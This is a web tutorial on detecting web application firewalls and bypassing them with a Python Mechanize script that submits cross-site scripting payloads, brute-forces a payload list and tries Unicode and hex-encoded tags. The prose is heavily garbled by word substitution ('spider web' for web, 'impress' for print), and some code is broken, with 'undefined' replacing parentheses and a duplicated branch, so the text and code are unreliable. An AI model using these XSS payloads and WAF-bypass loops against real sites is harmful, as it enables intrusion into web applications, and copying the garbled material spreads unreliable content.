Web application firewalls are ordinarily placed inwards front end of the spider web server to filter the malicious traffic coming towards server. If y'all arehired equally a penetration tester for or as well as hence society as well as they forgot to say y'all that they are using spider web application firewall than y'all mightiness move inwards a serious mess. 
The figure below depicts the working of a unproblematic spider web application firewall: As y'all tin encounter its similar a wall betwixt spider web traffic as well as spider web server, ordinarily straight off a days spider web application firewalls are signature based.
What is a signature based firewall?
In a signature based firewall y'all define signatures, equally y'all know spider web attacks follow similar patters or signatures equally well. So nosotros tin define the matching patterns as well as block them, i.e.
Payload :- <svg><script>alert`1`<p>
The payload defined inwards a higher house is a variety of cross site scripting attack, as well as nosotros know that all these attacks tin incorporate next substring -> “<script>”, as well as hence why don’t nosotros define a signature that tin block a spider web traffic if it contains this sub string, nosotros tin define 2-3 signatures equally defined below:
- <script>
- alert(*)
First signature volition block whatsoever asking that contains substring, as well as instant 1 volition block alert(any text). So, this is how signature based firewall works.
How to know at that spot is a firewall?
If y'all are performing a penetration examine as well as y'all didn’t know that at that spot was a firewall blocking the traffic than it tin waste materials a lot of your time, because most of the fourth dimension your assault payloads are getting blocked past times the firewall non past times your application code, as well as y'all mightiness cease upwards thinking that the application y'all are testing convey a secure expert as well as is expert to go. So, it is a expert persuasion to commencement examine for spider web application firewall presence earlier y'all start your penetration test.
Most of the firewalls today instruct out or as well as hence tracks nearly them, straight off If y'all assault a spider web application using the payload nosotros defined inwards a higher house as well as instruct the next response:
HTTP/1.1 406 Not Acceptable
Date: Mon, 10 January 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the requested resources could non endure flora on this server. This mistake was generated past times Mod_Security.
You tin clearly encounter that your assault was blocked past times the Mod_Security firewall. In this article nosotros volition encounter how nosotros tin develop a unproblematic python script that tin create this occupation detecting firewall as well as bypassing it.
Step 1: Define HTML Document as well as PHP Script!
We volition convey to define our HTML document for injection of payload as well as corresponding PHP script to handgrip the data. We convey defined both of them below.
We volition endure using the next HTML Document:
<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
PHP Script:
<html>
<body>
Data from the cast : <?php echo $_POST["data"]; ?><br>
</body>
</html>
Step 2: Prepare malicious request!
Our instant footstep towards detecting the firewall presence is creating a malicious cross site scripting asking that tin endure blocked past times the firewall. We volition endure using a python module called ‘Mechanize’, to know to a greater extent than nearly this module delight read the next article :
If y'all already know nearly Mechanize, y'all tin skip reading the article. Now that y'all know nearly Mechanize, nosotros tin lead the spider web cast acquaint on whatsoever page as well as submit the request. Following code snippet tin endure used to create that:
import mechanize equally mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)
Lets speak over this code describe wise:
- On the commencement describe we’ve imported the mechanize module as well as given it a curt holler ‘mec’ for after reference.
- To download a spider web page using mechanize, instantiation of browser is required. We’ve only did that inwards the instant describe of the code.
- On the commencement footstep we’ve defined our HTML document, inwards which the cast holler was ‘waf’, nosotros require to say mechanize to lead this cast for submission, as well as hence we’ve this holler inwards a variable called formName.
- Than nosotros opened this url, only similar nosotros create inwards a browser. After the page gets opened nosotros fill upwards inwards the cast as well as submit data, as well as hence opening of page is same here.
- Finally we’ve selected the cast using ‘select_form’ business office passing it ‘formName’ variable.
As y'all tin encounter inwards the HTML source code, that this cast convey solely 1 input field, as well as nosotros are going to inject our payload inwards that plain as well as 1 time nosotros have answer we’re going to inspect it for know strings to discovery the presence of the spider web application firewall.
Step 3: Prepare the payload
In our HTML document we’ve specified 1 input plain using this code:
input type="text" name="data">
You tin encounter that holler of this plain is ‘data’, nosotros tin usage next flake of code to define input for this plain :
crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad
- First describe saves our payload inwards a variable.
- In a instant describe of code, we’ve assigned our payload to a cast plain ‘data’.
We tin straight off safely submit this cast as well as inspect the response.
Step 4: Submit the cast as well as tape Response
Code I am going to refer after this describe volition submit the cast as well as tape the response:
maliciousRequest.submit()
response = maliciousRequest.response().read()
print response
- Submit the form.
- Save the answer inwards a variable.
- Print the answer back.
As I currently convey no firewall installed, the answer I got is :
As y'all tin encounter that payload is printed dorsum to us, agency no filtering is acquaint on the application code as well as due to the absence of firewall our asking was equally good non blocked.
Step 5: Detect the Presence of firewall
Variable named ‘response’ contains the answer nosotros got from server, nosotros tin usage the answer to discovery presence of firewall. We volition endeavour to discovery the presence of next firewalls inwards this tutorial.
- WebKnight.
- Mod_Security.
- Dot Defender.
Let encounter how nosotros tin accomplish this amongst python code:
if response.find('WebKnight') >= 0:
impress "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
impress "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
impress "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
impress "Firewall detected: Dot Defender"
else:
impress "No Firewall Present"
If Web Knight firewall is installed as well as our asking got blocked, answer string volition incorporate ‘WebKnight’ within it or as well as hence where, as well as hence discovery business office volition furnish value greater than 0, that agency WebKnight firewall is present. Similarly nosotros tin cheque for other 2 firewalls equally well. We tin extend this pocket-size application to discovery for equally many publish of firewalls, but y'all must know at that spot answer behavior.
Using Brute forcefulness to bypass Firewall filter
I’ve mentioned inwards the start of the article that to a greater extent than oftentimes than non firewall these days block requests based on signatures. But at that spot are hundreds as well as thousands of ways y'all tin build a payload. Java script is becoming complex twenty-four hours past times day, nosotros tin brand a listing of payloads, as well as endeavour each of them, tape each answer as well as cheque if nosotros was able to bypass the firewall or not. Please banking concern notation that if firewall rules are good defined than this approach mightiness non work. Let encounter how nosotros tin creature forcefulness using python:
listofPayloads = ['<dialog open="" onclose="alertundefined1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alertundefined1)">CLICK ME<a>']
for payLoads inwards listofPayloads:
maliciousRequest = mec.Browserundefined)
formName = 'waf'
maliciousRequest.openundefined"http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_formundefinedformName)
maliciousRequest.form['data'] = payLoads
maliciousRequest.submitundefined)
answer = maliciousRequest.responseundefined).readundefined)
if response.findundefined'WebKnight') >= 0:
impress "Firewall detected: WebKnight"
elif response.findundefined'Mod_Security') >= 0:
impress "Firewall detected: Mod Security"
elif response.findundefined'Mod_Security') >= 0:
impress "Firewall detected: Mod Security"
elif response.findundefined'dotDefender') >= 0:
impress "Firewall detected: Dot Defender"
else:
impress "No Firewall Present"
- On the commencement describe we’ve defined a listing of iii payloads, y'all tin extend this listing as well as add together equally many payloads equally y'all require.
- Then within the for loop nosotros did the same procedure nosotros did above, but this fourth dimension for each payload inwards a list.
- Upon receiving answer nosotros 1 time again compare as well as encounter reckon if firewall is acquaint on not.
As I’ve had no firewall installed, my output was:
Convert HTML Tags to Unicode or Hex Entities
If for event firewall is filtering html tags similar . We tin shipping their corresponding Unicode or Hex Entities as well as encounter if they are beingness converted to at that spot master copy form, if so, than this could endure an entry betoken equally well. Code below tin endure used to examine this process:
listofPayloads = ['<b>','u003cbu003e','x3cbx3e']
for payLoads inwards listofPayloads:
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)
maliciousRequest.form['data'] = payLoads
maliciousRequest.submit()
answer = maliciousRequest.response().read()
impress "---------------------------------------------------"
impress response
impress "---------------------------------------------------"
Each fourth dimension nosotros volition shipping the encoded entry as well as inwards the answer nosotros volition examine if it got converted or printed dorsum without conversion, when I ran this code I got the this output :
Means none of the encoded entry got converted to its master copy form.
Conclusion
The usage of this article was to educate y'all inwards advance as well as hence that y'all tin penetrate your firewall earlier a hacker tin do. It is e'er a expert choice to self examine your network infrastructure for vulnerabilities, because our commencement describe of piece of work e'er is to instruct our application upwards as well as running as well as nosotros overlook the safety part. But it must non endure over looked, because after it tin endure a huge headache. Complete source code tin endure downloaded from this link.
Author Info:
Usman Nasir, founder, as well as writer of Cyberpersons is a Computer Science student. I equally good worked equally a technical back upwards staff at diverse hosting companies as well as dear to write nearly Linux as well as spider web application security.
